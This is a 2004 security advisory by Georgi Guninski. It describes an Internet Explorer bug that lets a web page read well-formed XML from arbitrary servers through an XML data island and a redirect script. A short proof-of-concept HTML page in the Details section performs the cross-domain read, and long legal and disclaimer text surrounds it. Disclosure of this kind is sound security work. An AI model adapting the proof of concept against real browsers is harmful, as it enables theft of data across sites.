Georgi Guninski security advisory #71, 2004
Yet another IE aperture
Systems affected:
tested on patched IE on win2k and xp
Date: 7 October 2004
Update: 9 October 2004
Greymagic have disclosed
the same bug in 2002 - http://www.greymagic.com/security/advisories/gm009-ie/
The bug is still functional - check
here or
here
Legal Notice:
This Advisory is Copyright (c) 2004 Georgi Guninski.
You may not modify it
and distribute it
or distribute parts of it without the author's
written permission - this especially
applies to so called "vulnerabilities databases" and
securityfocus, microsoft, cert and mitre.
If you want
to link
to this
content use
the URL:
http://www.guninski.com/where_do_you_want_billg_to_go_today_1.html
Anything in this document may change without notice.
Disclaimer:
The information in this advisory is
believed to be true
though
it may be false.
The opinions expressed in this advisory
and program are my own and
not of any
company. The usual
standard disclaimer applies, especially
the fact that Georgi Guninski is not
liable for any damages caused by
direct or indirect use
of the information or functionality
provided by this advisory or
program. Georgi Guninski
bears no responsibility for content or
misuse of
this advisory or program or any derivatives
thereof.
Description:
By opening html in IE it is possible to read at least well formed xml
from arbitrary servers. The info then may be transmitted.
Details:
Consider this:
---------
<html>
<script>
function f()
{
alert(document.all.x1.XMLDocument.xml);
}
</script>
<body onload="f()">
<script id="x1" language="xml"
src="/cgi-bin/redir.pl"></script>
<h1>
Copyright
Georgi Guninski <br />
Cannot be used
in any database
</h1>
</body>
</html>
---------
redir.pl does a http redirect.
Georgi Guninski
http://www.guninski.com